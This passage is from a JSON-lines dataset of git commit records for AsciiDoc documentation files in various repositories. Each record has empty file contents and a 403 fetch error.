Subscribers!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-12-Google-Invites-for-Subscribers.adoc","new_file":"_posts\/2011-07-12-Google-Invites-for-Subscribers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09112a6b837e3e114f636ed91f06de1e8f7b049","subject":"Update 2014-12-30-Semantic-versioning.adoc","message":"Update 2014-12-30-Semantic-versioning.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-12-30-Semantic-versioning.adoc","new_file":"_posts\/2014-12-30-Semantic-versioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"031b05b770e71ba3655665bf920ae31ab2c7b956","subject":"Removed embedded control char from docs","message":"Removed embedded control char from docs\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d45eb27006756780d38ed0e019842c4223f2dffd","subject":"docs: split disk failure from disk config changes","message":"docs: split disk failure from disk config changes\n\nThe administration notes commented on Kudu's handling of disk failures\nwith instructions to rebuild a tserver with a new directory\nconfiguration. 
While related, these two are separate and should be\ndocumented as such.\n\nChange-Id: I732286d0f56f7a15705ad544fc7dfc426287714e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7984\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0744a6945b6d280a9e156f0f5d89e45fce17bc9","subject":"Update 2014-05-16-Commits-safety-first.adoc","message":"Update 2014-05-16-Commits-safety-first.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-16-Commits-safety-first.adoc","new_file":"_posts\/2014-05-16-Commits-safety-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857f278a75aeb0f2547f73dcb7ddc425c31aea1b","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1a19caab857a38edaf4ffa068e34e28f506855","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f0b262ddf07aa6784a4d9f23394e785fc4f9e9f","subject":"Update 2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","message":"Update 
2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","new_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ecf307280ea81825c04732183ef6c1f0a2bd5fa","subject":"Update 2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","message":"Update 2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","repos":"manikmagar\/manikmagar.github.io,manikmagar\/manikmagar.github.io","old_file":"_posts\/2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","new_file":"_posts\/2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manikmagar\/manikmagar.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbffbe4d1fa3ebffeb7839996a725599296a9418","subject":"Create do-contribution-file-fil.adoc","message":"Create do-contribution-file-fil.adoc\n\nFilipino translation for do-contribution-file.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-contribution-file-fil.adoc","new_file":"src\/do\/do-contribution-file-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1064e0d3b44e9dca9471a08df4bfaedfadee0757","subject":"Add release notes for Camel 2.24.0","message":"Add release notes for Camel 
2.24.0\n","repos":"cunningt\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,alvinkwekel\/camel,CodeSmell\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,Fabryprog\/camel,pmoerenhout\/camel,objectiser\/camel,Fabryprog\/camel,nicolaferraro\/camel,DariusX\/camel,christophd\/camel,mcollovati\/camel,CodeSmell\/camel,gnodet\/camel,DariusX\/camel,objectiser\/camel,mcollovati\/camel,tadayosi\/camel,objectiser\/camel,mcollovati\/camel,ullgren\/camel,ullgren\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,gnodet\/camel,davidkarlsen\/camel,CodeSmell\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,zregvart\/camel,ullgren\/camel,DariusX\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,alvinkwekel\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,davidkarlsen\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,ullgren\/camel,davidkarlsen\/camel,tdiesler\/camel,Fabryprog\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,apache\/camel,mcollovati\/camel,pax95\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pax95\/camel,Fabryprog\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,pmoerenhout\/camel,tdiesler\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2240-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2240-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59db0e0f2816299d4b61b1b6cb0eecca0452acb7","subject":"KUDU-1333. Add more packages to the RHEL installation documentation","message":"KUDU-1333. 
Add more packages to the RHEL installation documentation\n\nAdd missing packages to the initial yum install command for RHEL.\n\nChange-Id: Iae500ee037e3d1f2e73caf91485baf5ba3c54c36\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2179\nTested-by: Kudu Jenkins\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4b77a2543fb1eced94eced10f665420ba5430b1","subject":"Add generated restapi docs (#1867)","message":"Add generated restapi docs (#1867)\n\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/common\/restapi-reference.adoc","new_file":"documentation\/common\/restapi-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d5aaa2d3a79ef7ed381b7ee50676f15a5336f45","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333aace58edba247cec1db3fb6136977a834f0c4","subject":"Deleted 2016-08-27.adoc","message":"Deleted 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9274d8ca38eb1ced1a77f29bdc4670e98468dba1","subject":"Added compiler directory","message":"Added compiler 
directory\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"036572f44b77cd44092c8639ed6093671ce095de","subject":"Update docs for new app path and clj instructions (#224)","message":"Update docs for new app path and clj instructions (#224)\n\n","repos":"delitescere\/yada,delitescere\/yada,juxt\/yada,juxt\/yada,juxt\/yada,delitescere\/yada","old_file":"doc\/getting-started.adoc","new_file":"doc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6313b1dd3fa5af87a7121dadf7c1c73df1eaf135","subject":"Updated Linux OS distributions section, added change log","message":"Updated Linux OS distributions section, added change log\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d1cd1674e8dd8ef3f9bc2b5d3e86d95a3dbceb0d","subject":"Fix README links","message":"Fix README links\n\n[ci-skip]\n","repos":"K2InformaticsGmbH\/ranch,layerhq\/ranch,ninenines\/ranch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"a47b3ecf9ec1257506f6aa239c00ff8735030994","subject":"Update 2016-03-01-go-bean-Design.adoc","message":"Update 2016-03-01-go-bean-Design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-01-go-bean-Design.adoc","new_file":"_posts\/2016-03-01-go-bean-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6c1b15330005934eeceec9453293aced33d9ff2","subject":"Update 2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","message":"Update 2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","new_file":"_posts\/2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"073aa067d0427283b1a925572d58f40bb0c959ab","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 
2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"285e1d78bc034c7093a09d6277ed750b302f45de","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f2dcec7b1efac31548197677603a26ec1ff6fb","subject":"Update Links to new Job-Room","message":"Update Links to new Job-Room","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37d9ee8b6ea1240a1455b4c6fc646d9ead98d449","subject":"Update 2015-07-21-Liebes-Tagebuch.adoc","message":"Update 2015-07-21-Liebes-Tagebuch.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-07-21-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-07-21-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"512812928cd8271f74b0d4c8c643208061b0aab5","subject":"Renamed '_posts\/2018-06-01-Your-Blog-title.adoc' to '_posts\/2019-01-31-Your-Blog-title.adoc'","message":"Renamed '_posts\/2018-06-01-Your-Blog-title.adoc' to '_posts\/2019-01-31-Your-Blog-title.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d4afde52303c27867f349af4c93925f7af1c288","subject":"#577 doc","message":"#577 doc\n","repos":"uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 
403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3d87071de8b8955a476a7f407bd1cb2ec5e3279e","subject":"Add documentation for legacy secondaries","message":"Add documentation for legacy secondaries\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/legacysecondary.adoc","new_file":"docs\/legacysecondary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"8728dfc680d60f3482938f8c2876cc53301aab58","subject":"[docs] Add docs about disk usage due to sparse files","message":"[docs] Add docs about disk usage due to sparse files\n\nA few times users have been confused about the amount of space Kudu\nis using with the log block manager because Kudu uses sparse files.\nThis adds a quick bit of docs explaining the source of this\ndiscrepancy and showing how to get accurate numbers.\n\nChange-Id: I4e73d7d5f2edc8a2676f3207e06d29ec89f7e1a0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9817\nTested-by: Kudu Jenkins\nReviewed-by: Attila Bukor <53758272babe3057a5ff4ad51afd9bfd6e6014a1@cloudera.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6a6d4c3e0929334dde7d2ffa36fdfb6e67eda7e","subject":"Update 2015-12-28-Angulartics-100-released.adoc","message":"Update 2015-12-28-Angulartics-100-released.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2015-12-28-Angulartics-100-released.adoc","new_file":"_posts\/2015-12-28-Angulartics-100-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b5989e61b076d8ff2b9ba0e811d83389c483b7","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 
2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23180e03b1adef92cef4235279303cbb1ef299f4","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d52c7f3de7ca955c5423a60af3a65cf78c1f31ca","subject":"Update 2018-04-13-Amazon-Echover.adoc","message":"Update 2018-04-13-Amazon-Echover.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9336905344457dd41a2be661e0da8c9a738f6a6f","subject":"Update 2018-04-23-Crypto-Zombies.adoc","message":"Update 2018-04-23-Crypto-Zombies.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f20e23c4c72efd9f3d654bbfbfbd0d9c4acf082","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa1db7e607fd715367222638778ab93e040f0c79","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 
2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"105f5d0554478b358d92986fa174387607b3f487","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921a53eef3691244cd872ee593069f2ae8c84d83","subject":"y2b create post Don't Buy The Wrong Hard Drive!","message":"y2b create post Don't Buy The Wrong Hard Drive!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-27-Dont-Buy-The-Wrong-Hard-Drive.adoc","new_file":"_posts\/2015-10-27-Dont-Buy-The-Wrong-Hard-Drive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b65e9ac78559674e15de38fbae95deadda33affe","subject":"doc: glossary: defining ODP thread more precisely","message":"doc: glossary: defining ODP thread more precisely\n\nSigned-off-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nReviewed-and-tested-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov 